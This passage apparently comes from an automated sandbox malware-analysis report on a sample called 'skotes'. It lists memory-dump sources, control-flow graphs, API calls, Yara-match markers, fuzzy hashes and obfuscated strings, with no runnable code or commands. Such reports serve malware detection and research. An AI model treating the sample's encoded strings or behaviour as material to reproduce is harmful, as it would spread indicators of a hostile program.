                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoNativeSystem
                                                • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$Ps
                                                • API String ID: 1721193555-2159040288
                                                • Opcode ID: f34cad91e0c2f7caf97b6be8e59aec1ac96357821790934e762676d9525ca8fc
                                                • Instruction ID: 16564a1f4a9c61c77816a49a3fe3973092ea47fd5b7a9c5a7b50cd7d467a4361
                                                • Opcode Fuzzy Hash: f34cad91e0c2f7caf97b6be8e59aec1ac96357821790934e762676d9525ca8fc
                                                • Instruction Fuzzy Hash: CFE1D6B0E00654DBDB28BB28DD4B3AD7B61AB45720FA44298E415673C3EB3D5E8187D3

                                                Control-flow Graph

                                                control_flow_graph 1343 728380-728401 call 7540f0 1347 728403-728408 1343->1347 1348 72840d-728435 call 737a00 call 725c10 1343->1348 1349 72854f-72856b call 73cff1 1347->1349 1356 728437 1348->1356 1357 728439-72845b call 737a00 call 725c10 1348->1357 1356->1357 1362 72845f-728478 1357->1362 1363 72845d 1357->1363 1366 72847a-728489 1362->1366 1367 7284a9-7284d4 1362->1367 1363->1362 1368 72848b-728499 1366->1368 1369 72849f-7284a6 call 73d663 1366->1369 1370 728501-728522 1367->1370 1371 7284d6-7284e5 1367->1371 1368->1369 1372 72856c-728571 call 756c6a 1368->1372 1369->1367 1376 728524-728526 GetNativeSystemInfo 1370->1376 1377 728528-72852d 1370->1377 1374 7284f7-7284fe call 73d663 1371->1374 1375 7284e7-7284f5 1371->1375 1374->1370 1375->1372 1375->1374 1381 72852e-728535 1376->1381 1377->1381 1381->1349 1383 728537-72853f 1381->1383 1386 728541-728546 1383->1386 1387 728548-72854b 1383->1387 1386->1349 1387->1349 1388 72854d 1387->1388 1388->1349
                                                APIs
                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 00728524
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoNativeSystem
                                                • String ID:
                                                • API String ID: 1721193555-0
                                                • Opcode ID: b7f1173ae53de01e1fbfd4127ee6ce2e4fc1da5c91387035c57c34682b4ca8ed
                                                • Instruction ID: 423f9512d102399a976c91285ac910c26a74f8040d836e14a7a528d4292c5ef6
                                                • Opcode Fuzzy Hash: b7f1173ae53de01e1fbfd4127ee6ce2e4fc1da5c91387035c57c34682b4ca8ed
                                                • Instruction Fuzzy Hash: E8515870D01268DBEB24EF68DD49BDDB774DB45310F504298E814A72C2EF3A9E808B92

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 155817035049c5ca7aeaa619b2aaa394aa421b1cebaad954cb9ee5f21750ee2d
                                                • Instruction ID: 07cdb3a159a75a0dcf4ad94a6b87d3856cbda94b7735a63f24455009e43c5d44
                                                • Opcode Fuzzy Hash: 155817035049c5ca7aeaa619b2aaa394aa421b1cebaad954cb9ee5f21750ee2d
                                                • Instruction Fuzzy Hash: EBF0D6B1A40614E7C6147B7C9C0671E7B74AB06771F904648E811772D2E7381A0187D3

                                                Control-flow Graph

                                                control_flow_graph 1435 4b40b99-4b40b9a 1436 4b40b9c-4b40ba7 call 4b40bb7 1435->1436 1437 4b40c0f 1435->1437 1438 4b40bf5-4b40c0a 1436->1438 1437->1438 1439 4b40c11-4b40c18 1437->1439 1443 4b40c1a 1438->1443 1442 4b40c1f-4b40c24 1439->1442 1439->1443 1445 4b40c2f-4b40cb4 1442->1445 1443->1445 1451 4b40cba-4b40ce2 1445->1451
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5a96d860c82429a2a02a933f5f1ac0eda4bb0eb7481fbb375727b3d40799c04
                                                • Instruction ID: 2a4bb1556fbdba679eff4f6d27b977088f859ab8419b0214ca1c9dde2cd488ab
                                                • Opcode Fuzzy Hash: d5a96d860c82429a2a02a933f5f1ac0eda4bb0eb7481fbb375727b3d40799c04
                                                • Instruction Fuzzy Hash: F401686720F654FEA20232816F18AB97A18EAD733133084EEFB87C9603E65125C5F577

                                                Control-flow Graph

                                                control_flow_graph 1454 4b40c2a-4b40c2c 1455 4b40c2e 1454->1455 1456 4b40c38-4b40c3f 1454->1456 1457 4b40bcd-4b40c1a 1455->1457 1458 4b40c2f-4b40c33 1455->1458 1459 4b40c41-4b40cb4 1456->1459 1457->1458 1458->1459 1469 4b40cba-4b40ce2 1459->1469
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 386c4b3ef8da6036f4fc02a0eeefa3522dda0f34fc8297a63eca685725d13e87
                                                • Instruction ID: 18959043874963d42cd3ffb4edaa86f7598221cdd0b904bf5397fbe09e84a08f
                                                • Opcode Fuzzy Hash: 386c4b3ef8da6036f4fc02a0eeefa3522dda0f34fc8297a63eca685725d13e87
                                                • Instruction Fuzzy Hash: C801706B30F151FD52027581BB05ABD7E2ED6C633033084E6FB87C9503F255299571B2

                                                Control-flow Graph

                                                control_flow_graph 1488 4b40bb7-4b40ce2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17d7629207b2e97a3b45314596c3151fe01109f5022ba1bf90de2e5a39c50ace
                                                • Instruction ID: 26e17a58e6ca28de9867b6c4af770cb9e59af975b83725f96c591dd1904e1da0
                                                • Opcode Fuzzy Hash: 17d7629207b2e97a3b45314596c3151fe01109f5022ba1bf90de2e5a39c50ace
                                                • Instruction Fuzzy Hash: 7601F4AB31E221FD610235857B109F97B2EE6D733133084E6FB47C9A03F29529847072

                                                Control-flow Graph

                                                control_flow_graph 1472 4b40bae-4b40cb4 1485 4b40cba-4b40ce2 1472->1485
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95a60817f8cfc6c7b2952e52ee8fd160a7e1cac56f62b6e7bf44fa246e357285
                                                • Instruction ID: 07fe1c0ab9cb0406fd23a661647e3f71a369d7e33e18c6f6f9fd5cc86e1b1775
                                                • Opcode Fuzzy Hash: 95a60817f8cfc6c7b2952e52ee8fd160a7e1cac56f62b6e7bf44fa246e357285
                                                • Instruction Fuzzy Hash: 5C0126A731E221FD51023A856B109B97A2DE6E733033085E6FB47C9603F3A5299475B2

                                                Control-flow Graph

                                                control_flow_graph 1504 4b40bc3-4b40cb4 1517 4b40cba-4b40ce2 1504->1517
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e57d544346bb9d0d5bfbb694ec8ecf9179a3d362aac91eb68562c635c7007ff
                                                • Instruction ID: bb46bd4b86146ad2bc4d9c71afd9d8fe240efeb2c686fc60b0d48f6a795dab6e
                                                • Opcode Fuzzy Hash: 8e57d544346bb9d0d5bfbb694ec8ecf9179a3d362aac91eb68562c635c7007ff
                                                • Instruction Fuzzy Hash: 4D01206630E251FE9202764167019BD7B6EE6C733033044EABA87C5603E2651554B172
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd085fc2315eb3037da7a3863454fe64b74ce701c66da817b7ce0552f4e076c5
                                                • Instruction ID: 51af451e46c1109495c5caccb2e9ea802c51ba735728d51a700e797c2301dbae
                                                • Opcode Fuzzy Hash: fd085fc2315eb3037da7a3863454fe64b74ce701c66da817b7ce0552f4e076c5
                                                • Instruction Fuzzy Hash: 75012DB730E266FD520376816B019BDBB2DEAD637033044A5FB87CA503F29565547172
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0b5582106d728bda72cbe4cde7f813d72c694b61571c6fbd1da59466ecc5fa1
                                                • Instruction ID: a73b23894a06d832536b419579ab4d05332e27a827832df781b157d8ad899721
                                                • Opcode Fuzzy Hash: e0b5582106d728bda72cbe4cde7f813d72c694b61571c6fbd1da59466ecc5fa1
                                                • Instruction Fuzzy Hash: 41F0286730F150FE56022581BB049B9BB28EACA33033084EAFB87CA103E2A51590B573
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dc158d9ba2bd510fa20465372a2556dee6ae6aa641f66fef5b9a9c2532c40f4
                                                • Instruction ID: abbb30a50d87b03e60de83b96633b605ee460087633dac6b1c1edc4b9f20fe47
                                                • Opcode Fuzzy Hash: 0dc158d9ba2bd510fa20465372a2556dee6ae6aa641f66fef5b9a9c2532c40f4
                                                • Instruction Fuzzy Hash: F7F0216731E151FD67027991BA109FA3B29D9C67303308896F786C6513E2652885F572
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d35220bc8a718398600154d6a432edc95f257674fb4ddd9550bd8cc4dcafd5e2
                                                • Instruction ID: af35715dd58ee9eaac234f4847b4ec85e006b309fd20c73f4f00ea25e542de90
                                                • Opcode Fuzzy Hash: d35220bc8a718398600154d6a432edc95f257674fb4ddd9550bd8cc4dcafd5e2
                                                • Instruction Fuzzy Hash: 3EE0E52730A205EEC6023A91BB146BA7B65EBDA32173045A1F6C2DA642E2A11085B692
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83ffa9709553790d02387838ab4d9e5305dffa3572c483a87b7d9e0d99b54d23
                                                • Instruction ID: a3488e7343c38b1712a80d97458233ab956f2610a41771aefa82d053b142c361
                                                • Opcode Fuzzy Hash: 83ffa9709553790d02387838ab4d9e5305dffa3572c483a87b7d9e0d99b54d23
                                                • Instruction Fuzzy Hash: 63D0C21720A250E642033AE1624007979A6BD9723233404A5B782C9707E19A0080B663
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2664387483.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_4b40000_skotes.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13b54e5c7bc54e7dbe236157f5372239a5df3d11a1e3e6d87ff52d667ac08b6b
                                                • Instruction ID: 93878283d58de3eabbff676634079dc49ae10e9b72948f73b20d58b5067425fe
                                                • Opcode Fuzzy Hash: 13b54e5c7bc54e7dbe236157f5372239a5df3d11a1e3e6d87ff52d667ac08b6b
                                                • Instruction Fuzzy Hash: B9D0223370B220C783033CE211A01AA7083ADC36603F110B96143C7F8BF2879090B850
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1x$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                • API String ID: 0-385277979
                                                • Opcode ID: dfa7f49134b3774b525025dea2a0678f6d350a0ae708390af2396e277f6dc6ef
                                                • Instruction ID: 7967f13cf9e1e4d9af0b83e8496aef710cb3dacba5ebebdea10dc8602c201770
                                                • Opcode Fuzzy Hash: dfa7f49134b3774b525025dea2a0678f6d350a0ae708390af2396e277f6dc6ef
                                                • Instruction Fuzzy Hash: A182B370A04288DBEF18EF68C9497DE7FB5AB45304F508598E805673C3D7795A88CBD2
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: ca1313b2a7813e62e95c85987b7c920727e85457af6a47a033d4cf194be3ff32
                                                • Instruction ID: cf968aa18e924500aca0fc927347a81721c8043c68f52237ae4307488812b506
                                                • Opcode Fuzzy Hash: ca1313b2a7813e62e95c85987b7c920727e85457af6a47a033d4cf194be3ff32
                                                • Instruction Fuzzy Hash: 02C23871E086288FDB25CE28DD407EAB7B5EB48345F1441EAD84EE7241E779AE85CF40
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                • Instruction ID: a300056124b755d5b2995343648607b02e9c7f26df2352ed20f8b338239cbe8c
                                                • Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                                • Instruction Fuzzy Hash: 54F14F71E006199FDF14CFA8C9806ADF7B1FF49314F258269E81AAB345D735AE05CB90
                                                APIs
                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,0073CF52,?,?,?,?,0073CF87,?,?,?,?,?,?,0073C4FD,?,00000001), ref: 0073CC03
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Time$FilePreciseSystem
                                                • String ID:
                                                • API String ID: 1802150274-0
                                                • Opcode ID: 05951c46ae1e30e84c075be4ec7d1e10b7af3d40ea22c51d46e448cbe111d366
                                                • Instruction ID: 485c223c2ac1686d85f1741de28b320d0d7b67fa7a29553b2c874cbd4c0db6f8
                                                • Opcode Fuzzy Hash: 05951c46ae1e30e84c075be4ec7d1e10b7af3d40ea22c51d46e448cbe111d366
                                                • Instruction Fuzzy Hash: 0FD0223254313897AA022B84EC008ADBB88DF00B547009111EE0D33122CA19AC405BEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                • Instruction ID: e0ec63be924616536906e65cc1d99e74fe2c659e290fbd8910423cc994b45ae9
                                                • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                • Instruction Fuzzy Hash: 0A5139302086489BEBBC9A2898997FE67969B01302F14051DEC86F72D1CEDE9D4FC353
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17f817b487406906f7b93daf123e709dfe11eb3f44b7f0943133cd473f2647ca
                                                • Instruction ID: ca23007fc07b6762b021220f8091c8f19c373608b7fb65c76ee4f3cc6058c2f3
                                                • Opcode Fuzzy Hash: 17f817b487406906f7b93daf123e709dfe11eb3f44b7f0943133cd473f2647ca
